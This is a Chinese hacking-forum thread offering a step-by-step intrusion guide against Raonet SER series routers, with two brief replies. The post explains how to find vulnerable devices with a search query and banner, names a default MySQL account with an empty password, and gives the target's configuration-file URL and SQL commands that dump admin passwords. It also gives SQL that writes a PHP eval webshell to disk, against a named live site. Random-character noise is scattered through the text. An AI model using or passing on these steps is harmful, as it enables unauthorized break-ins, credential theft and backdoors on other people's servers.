找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3032|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:# F4 \% F$ q2 T& v9 L+ D

, T( I! R5 D$ k' I1:google搜索'Raonet Subscriber Ethernet Router'- I7 T0 P; O: q' ]7 s" o

) ?# s5 ~+ o8 Z( b- o2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# E. O, W( S" e0 m, F
( {2 Y1 E2 m  @8 a/ o& d' W0 h+ n3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
& n+ U  l. e% |- [/ `: w3 f( ~6 n0 n% I* h0 x; O( n
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......) Q- p' P! E. e7 C/ w2 V
5 C3 S/ n# \8 m) n2 P

+ L0 q0 s; x( c& C5 g6 V; q2 L8 l3 ?# h) w! ~
入侵步骤:9 D% T; x# F6 D) I$ b

$ ?% P% B+ i6 v' Y& {1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php4 }$ O4 ?% ~: M6 l4 e

& e! p8 z7 Q. k9 o2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
; _( S4 h& q3 |. k" ]! G8 k7 e, s$ G3:得到密码后连接,查看GUI管理密码:
/ _+ X! m9 {. Cuse ser_5005 _7 l7 q: R- E
select id,passwd from user;
; h8 S7 T& A+ Y5 f; q4:通过数据库写入webshell,执行命令:2 `+ J1 j/ H- A# d6 X: ~) _
use mysql;
& K) E* n. w% h: c9 M$ Rcreate table ok(cmd TEXT);
+ @. W% B+ D" m% Z% {insert into ok values("<?php @eval($_POST[cmd])?>");( ?) E( m% ^; \4 r
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 v- }" N. ^$ \! k
drop table ok;
+ _" w! B1 F, o- p( c5 X* e9 [
5 a; f$ q2 `3 M6 {5 t9 y) O5:连接后门shell.php
* R& n& u! G9 ?+ d8 d9 W. H
, Z3 j! N8 h$ h" A! l6. 搞定!
) h# ]  M% f: v$ l9 T
0 ^; M; ~, Q$ n. ?) r- K
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表